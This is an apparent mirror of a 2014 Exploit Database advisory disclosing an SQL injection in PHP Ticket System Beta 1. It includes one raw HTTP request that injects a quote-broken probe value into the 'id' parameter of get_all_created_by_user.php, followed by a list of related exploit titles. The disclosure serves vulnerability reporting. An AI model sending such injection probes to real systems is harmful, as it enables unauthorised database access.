PHP Ticket System Beta 1 – ‘get_all_created_by_user.php?id’ SQL Injection

Exploit Database
13 阅读

作者： HauntIT

日期： 2014-02-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/31971/

# ==============================================================
# Title ...| PHP Ticket System SQL Injection
# Version .| BETA_1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net/projects/phpticketsystem/
# ==============================================================

 
# ==============================================================
# SQL Injection

---<request>---
GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
Host: 10.149.14.62
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

last Exploits
PHP Ticket System Beta 1 – ‘get_all_created_by_user.php?id’ SQL Injection的更多信息

Simple Backup Plugin Python Exploit 2.7.10 – Path Traversal：
Joomla! Component Intranet Attendance Track 2.6.5 – SQL Injection：
W-Agora 4.2.1 – Multiple Vulnerabilities：
2DayBiz ybiz Network Community Script – SQL Injection / Cross-Site Scripting：
NASdeluxe NDL-2400r 2.01.09 – OS Command Injection：
Joomla! Component com_route – SQL Injection：
Joomla! Component com_leader – SQL Injection：
TP-Link C50 Wireless Router 3 – Cross-Site Request Forgery (Remote Reboot)：